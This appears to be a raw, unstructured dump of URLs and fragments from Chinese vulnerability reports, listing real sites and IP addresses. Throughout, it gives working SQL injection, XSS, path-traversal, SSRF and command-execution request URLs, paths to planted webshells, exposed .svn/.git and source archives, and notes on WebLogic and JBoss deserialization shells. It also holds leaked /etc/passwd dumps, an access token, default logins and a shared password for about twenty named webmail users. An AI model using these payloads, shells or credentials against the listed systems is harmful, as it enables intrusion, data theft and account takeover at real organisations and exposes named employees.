http://www.fft365.com/User/SaveUser.aspx?action=edit&self=self&editType=1 http://www.fft365.com/Department/UpdateDeptCompanyName.aspx http://www.fft365.com/Department/PermitIPList.aspx http://www.fft365.com/Department/LoginTime.aspx http://www.fft365.com/Aid/BatchTransfer.aspx http://www.fft365.com/Department/DeptAdd.aspx http://www.fft365.com/Department/DeptList.aspx http://www.fft365.com/User/AddUser.aspx http://www.fft365.com/User/UserList.aspx http://www.fft365.com/User/UserPurviewFullList.aspx http://oa.hengansl.com/data/ http://www.sinodata.net.cn/Znxs.aspx?cid=155&sid=254 http://**.**.**.**/show_itinerary.asp?seq=92 http://img1.jia.com:7001/ http://bbs.xyp2p.com/admin.php https://www.xyp2p.com/phpmyadmin http://121.14.65.32:8080/building.html http://121.14.65.32:8080/she11.jsp http://**.**.**.**:8081/90.cer http://58.48.109.70 http://**.**.**.**/qyLogin.shtml username:123 password:123456 http://219.232.202.154:8080/#/home http://**.**.**.**/Dept_main_Sms.aspx?id=31&type=1&t=2015 http://service.homelink.com.cn/wct/userfiles/agent/pressImages/shell.jsp http://service.homelink.com.cn/wct/userfiles/agent/pressImages/tunnel.jsp http://service.homelink.com.cn/wct/userfiles/agent/pressImages/chopper.jsp http://www.sinodata.net.cn http://**.**.**.**:7010/Vote.aspx?id=1 http://www.lionfund.com.cn/chatmain.do?id=2463 http://**.**.**.**/login.html http://**.**.**.**/mercTotal.action http://e.dxy.cn/opfracture/node/526#comment-38 http://qkyxjy.haoyisheng.com/ http://qkzgpx.haoyisheng.com/ http://newtopbox.haoyisheng.com/ http://gppx.haoyisheng.com/ http://qkzg.haoyisheng.com/ http://newtopbox.haoyisheng.com:8080/yaoyan/index.jsp?m=Login http://newtopbox.haoyisheng.com:8080/yy/index.jsp http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012 http://**.**.**.**/zxDoctorInformation.aspx?ID=6 http://**.**.**.**/zkClassCaseInfo.aspx?ID=1&Hospital=ZK00000001 http://**.**.**.**/zxQuestion.aspx?DoctorID=1 http://**.**.**.**/202/DoctInfo.aspx?ID=346 
http://**.**.**.**/Order202.aspx?Dept_Name= http://**.**.**.**/)存在弱管理员账号,在公网即可管理用户的路由。 http://l.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://gp.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://l.airchina.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.9.199.39:7004&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://photo.edufe.com.cn http://sparepart.dfac.com/dfbj/ http://**.**.**.**:7001/ www.xilingxueshan.cn http://www.12301.cc/dlogin_n.html http://www.028xcpw.com/index www.xilingxueshan.cn www.12301.cc http://pmos.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.qh.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.sbd.sx.sgcc.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://pmos.sgcc.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://mp.weixin.qq.com/wiki/7/1c97470084b73f8e224fe6d9bab1625b.html http://203.195.235.76/jssdk/sample.zip http://quote.cctvcj.com/stock/index.php?stock_code=* http://**.**.**.**:8081/ http://ccce.upc.edu.cn/shiyan/list.asp?id=895 http://ask.jia.com/.svn/entries http://img1.jia.com/.svn/entries http://weixin.jia.com/.svn/entries http://zhuangxiu.jia.com/.svn/entries http://zixun.jia.com/xuetang/.svn/entries http://**.**.**.**/bugs/wooyun-2010-0118263 http://**.**.**.**/ http://**.**.**.** http://**.**.**.**:7080 e61f:13ff:fe2e:7ce2%4 ffff:ffff:fffd%5 http://**.**.**.** http://**.**.**.**/bugs/wooyun-2015-0158293 http://hi.xuekewang.com/index.php?uid=zz01 https://27.115.34.17/epm/ http://www.baopal.com:7001存在反序列化漏洞 http://**.**.**.**:7001 http://**.**.**.**:7001/存在weblogic反序列化命令执行 http://**.**.**.**:7001 http://**.**.**.**:7001/ http://**.**.**.**/ http://**.**.**.**:7001/logonAction.do http://videosection.video.aol.com/application/configs/application.ini http://**.**.**.**:7001 http://googleinstall.anquanxia.com/admin/login http://googleinstall.anquanxia.com http://**.**.**.**/ http://mp.allinpay.com/ 
http://www.whsw.info:81/whsl/ http://i.ruanmei.com/ qq.com/123456 http://i.ruanmei.com/ http://www.ithome.com/ http://quan.ithome.com/ http://mail.quanyou.com.cn http://www.rayli.com.cn/ http://passport2.chaoxing.com/pwd/getpwd?refer=http%3A%2F%2Fwww.chaoxing.com%2Fchannelcookie%3Ftime%3D1449727680261&fid=0 http://qianbao.lubandai.cn/frontpage/web-qb/index.html erp.csztv.cn/member http://**.**.**.**/new_view.php?pid=513 a96a:8b29:1e87:4157%13 dcfa:401a:2415:202b:f5fa:c5f9 f5fa:c5f9%20 http://e.csztv.cn/menu.php?c=1 system:service=MainDeployer http://*/is.war https://**.**.**.**/timing/order/7498900 http://**.**.**.**:7001/defaultroot/login.jsp http://eip.chinatowercom.cn http://121.35.255.79:7007/存在weblogic,而且这个版本存在java反序列化命令执行漏洞。反弹一个shell。 http://webmail.300.cn/page/login/login.jsp http://pos.bsdglasses.com:7001/ http://product.china-pub.com/ebook4894212 http://ebook.bbbvip.com/soft/aireader.rar http://**.**.**.**:7001/defaultroot/login.jsp http://home.ithaier.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/aspx/connector.aspx http://**.**.**.**/ http://**.**.**.**:7001/defaultroot/login.jsp http://121.8.157.138:88/seeyon/main.do?method=main http://bbs.svw-volkswagen.com http://bbs.svw-volkswagen.com/viewthread2.php?tid=458059 http://newoa.glsc.com.cn:8082/ http://**.**.**.**/bmfw/zxdc/dcwj/index.jsp?id=1172&ic_id=747&text_name=%E6%96%B0%E7%9A%84%E5%BB%BA%E8%AE%AE,id存在注入,布尔类型盲注,丢进神器中。 http://cte.swu.edu.cn/ http://cte.swu.edu.cn/teachered/list.php?bid=35&sid=33 http://**.**.**.**:8112 encap:Ethernet e0:81:da:d3:18 feda:d318/64 Scope:Link MTU:1500 packets:12015417 dropped:172 packets:11464092 txqueuelen:1000 http://58.68.130.68/wis18/customerjsp/msyh/login/login.jsp http://58.68.130.72/wis18/customerjsp/msyh/login/login.jsp中国民生银行在线考试系统 http://**.**.**.**:8080/存在JAVA反序列化命令执行(JBoss),直接命令执行就是system权限,可新建帐户,直接登入3389,进入该公司的工作组内网,严重影响其内网安全。 http://www.easy-linkholiday.com/hotel_detail.asp?id=7930 
http://**.**.**.**:8180/webservices/login.action http://bkjyw.swu.edu.cn/ http://bkjyw.swu.edu.cn/index.php/article/index.html?uid=146 http://**.**.**.**/bugs/wooyun-2015-0159690 http://**.**.**.**/cpk/search/productdetail/?&product_no=2671 http://**.**.**.**/cpk/search/?action=search¶m_no=411,461,891,951&age=0,3&agefilter=age http://count.17oh.com/counter1.php?id=6459&sw=1920&sc=24&referer=&page=http%3A%2F%2Fscjg.liyang.gov.cn%2Fdefault.php%3Fmod%3Darticle%26fid%3D15790 http://count.17oh.com/counter2.php?id=6459&upid=&sw=1920&sc=24&referer=&page=http%3A%2F%2Fscjg.liyang.gov.cn%2Fdefault.php%3Fmod%3Darticle%26fid%3D15790 http://www.jxxch.com:8088/yyoa/ http://zzsf.tgbus.com/news/8687.html http://**.**.**.**/actions_index?actionsId=965221 http://wooyun.org/bugs/wooyun-2015-0157025 http://219.143.252.114/left.php http://219.143.252.114/main.php http://219.143.252.114/main.php?item=%B5%D8%B2%FA%BE%C6%B5%EA&data_id=2861 http://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 http://219.143.252.114/main.php?item=%BD%F0%C8%DA&data_id=296 http://219.143.252.114/mrjx_list.php?month=9 http://219.143.252.159/mrjx_list.php?month=9* http://219.143.252.159/whynot.php http://admin.job.sinopec.com http://**.**.**.**/ http://123.127.246.26:8080/login.action http://123.127.246.26:8080/she11.jsp http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-0112191 http://www.58pic.com/denglu/主站登录位置,无验证码无登陆限制 http://119.254.105.143/ticket/web/web.go?method=policyCal&showId=060671&seatIds=10210985&key=IF4F8DK1IFS891KF9S8FKFD8 http://119.254.105.222/zabbix/ http://119.254.105.172:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin jiadd:x:501:501::/home/jiadd:/bin/bash huangjp:x:502:502::/home/huangjp:/bin/bash http://career.upc.edu.cn/students/viewDay.asp?action=view&id=3368* http://pe.upc.edu.cn:888/ListScardMore.asp?ID=1* http://sydxb.upc.edu.cn/cmzx/art_list.asp?class=announcement&department=0* http://peetc.upc.edu.cn/Article.asp?id=22* http://sta.upc.edu.cn/show.asp?listid=333* http://peetc.upc.edu.cn/more.asp?typeid=6* http://pe.upc.edu.cn/Admin/login.Asp http://qks.upc.edu.cn/zr/expert.asp http://qks.upc.edu.cn/sk/toVol.asp http://www.bs.ecnu.edu.cn/teacher_ky.asp?id=287 http://www.bs.ecnu.edu.cn/teacher_gz.asp?id=287 http://www.bs.ecnu.edu.cn/teacher_jx.asp?id=287 http://www.bs.ecnu.edu.cn/mta/newshow.asp?id=1578 http://**.**.**.**:8080 http://**.**.**.**/CategoryPage.aspx?pid=1 http://edcard.sinopec.com encap:Ethernet addr:10.5.97.27 Bcast:10.5.97.255 
Mask:255.255.255.0 fe88:15fa/64 Scope:Link MTU:1500 packets:1071862366 packets:1738261439 txqueuelen:1000 admin.yunshouyi.net/Contact/Index), http://**.**.**.**/cgxx.aspxjid=100_ http://**.**.**/cgxx.aspxjid=211 http://member.honglingjin.cn/center/delivery_address/list?user_id=40002096939&access_token=60b7d95679cdc14a2e6e1f49d3f61f70 http://**.**.**.**/waplogin_loginIn.hnyxsm http://**.**.**.**/EbsWeb/myInsurance/zhongyiCarQuery.jsp encap:Ethernet fe74:5108/64 Scope:Link MTU:1500 packets:169746533 packets:227658387 http://211.144.203.118:8089/#/login http://www.91xke.com/web.rar http://**.**.**.**/kaoqin/index.php?c=member&m=getmemberinfo&id=15 http://aycrm.anschina.cn/aycrm/viewLogin.action http://oa.anschina.cn:8001/login/Login.jsp?logintype=1 http://www.wddjt.com/indexAction!init http://**.**.**.**/ http://www.cetools.cn/index.php/cetools_admin/index http://www.cetools.cn/uploads/zmobile_demo/b/247E240410E48046414AA74A407C8BBF.jpg http://**.**.**.**/XX_admin/ http://**.**.**.**/bugs/wooyun-2015-0158152 http://community.edufe.com.cn/faq/index.php?faqid=26 http://www.bkzs.sdu.edu.cn www.bkzs.sdu.edu.cn http://**.**.**.**/ http://**.**.**.**:28080/login www.wanglibao.com http://newee.newsmy.com/newee.html http://newee.newsmy.com/neweeDownload/downCenter.php?id=126 http://**.**.**.**/bugs/wooyun-2010-0109170 http://**.**.**.**/bugs/wooyun-2010-0111405 http://**.**.**.**:7001/loadMenu.do?modelNo=13 http://121.14.65.21:8080/building.html http://121.14.65.21:8080/she11.jsp http://**.**.**.**/bugs/wooyun-2010-0101996 http://**.**.**.** health.app.huan.tv/info.php?id=3329&isperson=y&page=1&list=list34&dflist=defaultFocusId1 http://ct.super8.com.cn:8081/TeamBuy.svc http://api.super8.com.cn/TeamBuyConstracts/SeacrhRecommend cn:8081 http://**.**.**.**/index.jsp http://**.**.**.**/game/search?key=1 http://***/?c=utils&m=upload&formname=form2&editname=simg&uppath=static/upfile&pn= 
http://**.**.**.**/DealLogin.aspx?hz=&action=login&str_username=admin%27%20or%20%271%27%3D%271&str_userpwd=adsfadf&reb=false http://218.78.217.83:7001/ http://180.153.27.8:7001 http://210.51.48.122:7001 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic10:x:500:500::/home/weblogic10:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash 
http://www4.tjtc.edu.cn/shekejingpinke/news/shownews.php?id=44 http://**.**.**.**/ShowNews.aspx?sn=15092315420303123200 http://**.**.**.**/city.asp?ClassID=2&ArticleID=23801 http://**.**.**.**/city.asp?ClassID=2&ArticleID=23801 http://www.famouscase.net/search.php http://www.famouscase.net/search.php http://mail.yaic.com.cn/ http://**.**.**.**/blog.php?ptype=news_content&blogid=532 http://**.**.**.**/blog.php?ptype=news_content&blogid=532 http://n http://**.**.**.**/news.asp?id=35748 http://**.**.**.**/news.asp?id=35748 https://**.**.**.**/owa/ http://**.**.**.**:7005/EbsWeb/getUnderwrite.do?firstFlag=true&UIAction=noticeQurey&id=1 http://wsjf.swu.edu.cn:8081/login.aspx http://**.**.**.**/display.jsp?articleId=4384329 http://**.**.**.**/display.jsp?articleId=4384329 http://qmqty.faw.com.cn:8080/qcbin/ http://cyber.swu.edu.cn/ http://cyber.swu.edu.cn/show.php?id=678 http://**.**.**.**/buy/login.asp http://**.**.**.** http://222.168.65.137:7001/ http://**.**.**.**/jobs.html http://**.**.**.** http://**.**.**.**/news.asp?id=48&bh=922 http://**.**.**.**/listnews.asp?id=200&bh=2566 http://**.**.**.**/xywweb/listzhdt.asp?id=257&bh=2519 http://**.**.**.**/listtzgg.asp?id=230&bh=2194 http://credit.midea.com.cn/fckeditor/editor/fckeditor.html直接上传文件 http://**.**.**.**/Account/GetpwdAction2 http://www.flyertrip.com/photels/personalCenter/orderDetail.php?flag=detail&id=7245 http://**.**.**.**/bugs/wooyun-2015-0118263 http://**.**.**.**/bugs/wooyun-2015-0120540 http://**.**.**.**:8060 URL:http://mail.ch.com/ URL:http://mail.tourspring.com/ URL:http://mail.springtour.com/ http://sms.china-sss.com:8080/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.160.249.13:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://**.**.**.**//bugs/wooyun-2015-0111086 http://rdbcs.midea.com.cn:8000/ http://rdbcs.midea.com.cn:8000/uddiexplorer/css.jsp http://ku.deshang365.com/api/resource/file_download?id=10287 
http://**.**.**.**/bugs/wooyun-2015-0120202 http://**.**.**.** http://**.**.**.**/JBZX/updateFile.aspx http://**.**.**.**/uploads/xunwu/2015.aspx http://**.**.**.**:9191/jybz/login.action存在Java反序列化漏洞执行命令漏洞 CVE:2013-4810 http://202.104.30.80:8000/ http://202.104.30.80/ http://202.104.30.80:8000/uddiexplorer/css.jsp http://202.104.30.80:8000/uddiexplorer/out.jsp http://k.yingjiesheng.com/center/这个地方没有验证码没有登录限制 http://**.**.**.**/console/loginOut http://**.**.**.**/ http://**.**.**.**//bugs/wooyun-2015-0112913 http://**.**.**.**:9999/ThamsWeb/thamsxp/ http://**.**.**.**/bugs/wooyun-2015-0117211 http://**.**.**.**:16080 http://**.**.**.**//bugs/wooyun-2015-0113541 http://**.**.**.**//bugs/wooyun-2015-0102929 http://**.**.**.**:8080 http://**.**.**.**//bugs/wooyun-2015-0110114 http://www.youjuke.com/存在redis未授权访问漏洞 www.youjuke.com,以root权限登录系统 http://shuo.rayli.com.cn/services/service.php?m=user&a=album_share&width=190&home_uid=2303150&album_id=210 http://shuo.rayli.com.cn/services/service.php?m=user&a=album_share&width=190&p=2&home_uid=2303150&album_id=210 http://shuo.rayli.com.cn/services/service.php?m=user&a=shareSelf&width=190&home_uid=2303150 http://**.**.**.**/ManageFrame/Index.aspx http://z.yirendai.com/login http://**.**.**.**:7001 http://**.**.**.**/web.zip http://**.**.**.**:7001/已经进远程ssh,登录服务器 https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult http://data.ku6.com/.git/config http://pay.ku6.com/.svn/entries admin:admin http://**.**.**.**/sea/login.jsp http://fftmail.shfft.com:9000/user/index http://**.**.**.**/index!index.action存在命令执行漏洞 http://**.**.**.**//bugs/wooyun-2015-0113255 http://**.**.**.**:9088/Lzfxfk/expertBaseRegister.action http://**.**.**.**/index.php?s=/Article/detail/column/313/articleid/15860.html http://**.**.**.**/index.php?s=/Article/detail/column/313*/articleid/15860.html http://**.**.**.**//bugs/wooyun-2015-0114191 http://www.huayiyuan.com/ 
http://movie.weibo.com/rank http://movie.weibo.com/movie/web/follow http://movie.weibo.com.test.com http://**.**.**.**/down/WinMyDNS.rar http://zc.hayao.com:8080/ebvp/infopub/showcontent?id=1001A11000000006CTGP http://**.**.**.**:8080/ http://**.**.**.**:8080 http://**.**.**.**/cxfz/selectInfo2.do http://bug.anquanxia.com/ http://125.218.212.235:81/config/static.php?type=list&id=38 http://**.**.**.**/web.rar http://imbatv.cn/uploads/uploads.zip http://**.**.**.**/bugs/wooyun-2010-0142469 http://**.**.**.**:80/news_show.php?id=7* http://**.**.**.**/contact.php post:message=88952634&name=88952634* http://**.**.**.**/products.php?cl=38* http://**.**.**.**/bugs/wooyun-2010-0109367 http://oa.daojia.58.com/seeyon/main.do http://**.**.**.**/bugs/wooyun-2010-0108834 https://app.wanda.cn/wanda3v/m/ssoLogin.html http://oa.derlook.com/loginAction!loginOut.do http://122.224.64.2:8181/bigzone_cy/login http://hndss.183.ha.cn:7001/ http://**.**.**.**/index.php http://**.**.**.**/product_show.php?id=1%20and%201=1 http://**.**.**.**/bugs/wooyun-2010-0148081 http://**.**.**.**/xcwenda.asp?subtype=%C4%EA%C1%E4%CC%F5%BC%FE&ztype=%B1%A8%C3%FB http://update.mocard.tv:8080/MOSP/receive.do?method=getVersion¶m=","PANEL":"MC-A1","ID":"DK1PS0Z0400","SVNVER":"6607","code":"1406061312","path":"/backup/usb.bin.tmp","brand":"818haier","ThreeD":"enable","DeviceType":"818EVAMOCARD","ChipPlatform":"MST6A818C","Ursa6M40Version":"disable","kernel":"3.1.10 http://oa.my089.cn:7001/defaultroot/login.jsp http://shuhua.e-nci.com/informate/more.jhtml http://shuhua.e-nci.com/informate/searchprize.jhtml?search=1 http://**.**.**.**:7001/defaultroot/login.jsp http://scan.cninsure.net/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://scan.cninsure.net/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd https://github.com/DooiooSource/td-utils/blob/a3c101c3993aee1055b83ac03968a7e030bf1363/src/main/resources/td-mail.properties 
https://github.com/fqybzhangji/FescoWeChat/tree/1c317dcd2e92157b40ee691062516e4315aeee81 http://**.**.**/WeiXinServiceManager.svc_ http://**.**.**/WFM/FormList3.aspx_ http://webmail.csvw.com/ mibo:1qaz@WSX zhufan:1qaz@WSX ChenKai:1qaz@WSX ZhangSan:1qaz@WSX HuXiaotian:1qaz@WSX ZhangCaifang:1qaz@WSX PengJian2:1qaz@WSX LiaoYulin:1qaz@WSX WangLinghai:1qaz@WSX LiuHui2:1qaz@WSX ChenWei9:1qaz@WSX ZhengQi:1qaz@WSX LiYan:1qaz@WSX YangWei:1qaz@WSX DaiLei:1qaz@WSX LuChaoqi:1qaz@WSX LiuYiqing:1qaz@WSX DuanJianfeng:1qaz@WSX zhangsansan:1qaz@WSX https://ran.svw.cn http://www.kiford.com/forget http://jders.midea.com.cn/Login.aspx http://jders.midea.com.cn/Login.aspx http://**.**.**.**:82/superadmin/adminLogin.action https://oa.xin.com/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:8080/zyhList.do?term_type=b http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**/ylxt/ http://**.**.**.**/ http://**.**.**.**/user_jyxq?from=actorder&orderid=11389 http://**.**.**.**/user_jyxq?from=actorder&orderid=11391 http://**.**.**.**/user_jyxq?from=actorder&orderid=11392 http://learning.bankofshanghai.com/ http://vpn.miaozhen.com http://oa.sy-yy.com:8989/yyoa/ http://enfo.ebpcapital.com/ http://**.**.**.**/bugs/wooyun-2010-0128218 http://**.**.**.**/bugs/wooyun-2010-0108437 http://**.**.**.**/ui/logon/station.jsp?nodecode=1&Flag=XYW&ChangeCom=1&nodesrc=1 admin:admin http://**.**.**.**/civility/login.html http://www.feizhiyi.com/User/buycourse.html http://www.feizhiyi.com/User/createorder.html http://www.feizhiyi.com/public/paymentlink http://**.**.**.**/ http://**.**.**.**/ptzx_website/HTML/ptzx/portal/index/index.htm http://**.**.**.**/ptzx_website/UserCenter/login.aspx http://**.**.**.**/login.asp?id=9 http://gtja.cobo.cn/logon.cobo?encodedId=1449820398679 http://gtja.cobo.cn/portal/org/FindPassword/BO.cobo http://gtja.cobo.cn http://m.yahui.cc/ http://m.yahui.cc/inc/loadMore.php 
http://www.inke.com.cn:81/Clients/Shops.aspx?Sid=5CCD89751E9B4B968A86ECEFEC244380&state=9 http://115.29.220.93:89/Clients/Shops.aspx?sid=5CCD89751E9B4B968A86ECEFEC244380&state=9 http://dz2th.300.cn//01/vote02/design/ http://dz2th.300.cn//01/vote02/design/py.asp?id=11 http://**.**.**.**/public/ZJJGInfo.aspx?code=176021 http://**.**.**.** http://**.**.**.**/chopper/chopper.jsp http://**.**.**.**/bugs/wooyun-2010-082349 http://**.**.**.**/bugs/wooyun-2010-0144201 http://m.sogou.com/web/searchList.jsp?uID=C9DyoHjANG34kxNk&v=5&e=1427&de=1&pid=sogou-clse-2996962656838a97&dp=1&w=1278&t=1449608685850&s_t=1449608696397&keyword=1@baidu.com%3Cimg+src%3D1+onerror%3Dalert%28%22wooyun%22%29%3E&pg=webSearchList http://219.143.230.134:7001/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin weblogic:x:500:500::/weblogic:/bin/bash ifpcod:x:501:500::/app/cod:/bin/bash ifpuser:x:502:500::/app/ifp:/bin/bash infuser:x:503:500::/app/inf:/bin/bash monitor:x:504:504::/app:/bin/bash splunk:x:505:505:Splunk Server:/opt/splunkforwarder:/bin/bash oem:x:506:500::/home/oem:/bin/bash csair:x:507:507::/app/ftp:/bin/bash mocha:x:888:888::/home/mocha:/bin/bash logviewer:x:889:889::/home/logviewer:/bin/bash viewer:x:890:890::/home/viewer:/bin/bash http://**.**.**.**/bugs/wooyun-2010-0144227 http://**.**.**.**/bugs/wooyun-2010-0144220 http://edu.docer.com http://edu.docer.com/search?keywords=法语 http://**.**.**.**/ http://**.**.**.**/uaw_tb/ http://171.8.66.189/ http://**.**.**.**/index.php?m=xdcms&c=login https://180.153.27.9/ http://180.153.27.154:7001/ http://210.51.48.123/login.jsp http://210.51.48.123:7001/ http://182.248.151.28:7001/ http://182.248.151.26:7001/ http://**.**.**.**/ http://202.204.160.3 http://www.6fires.com/index.html http://183.60.252.182:8081/ http://**.**.**.**/,端口为515,存在反序列化漏洞: http://**.**.**.**/lili/yuanpei/tree/899470dd293061b239741ac2f16486a62a855242/database http://**.**.**.**/ http://**.**.**.**/login.php http://boss.app-store.nubia.cn/ http://www.yugaopian.com/login http://www.yugaopian.com/login http://**.**.**.**:8080/login/Login.jsp?logintype=1 http://**.**.**.**:8080//page/maint/login/Page.jsp?templateId=18 http://zxxs.e21.cn/ http://aero.xmu.edu.cn/ http://aero.xmu.edu.cn/admin/login1.jsp http://121.14.65.122/ 
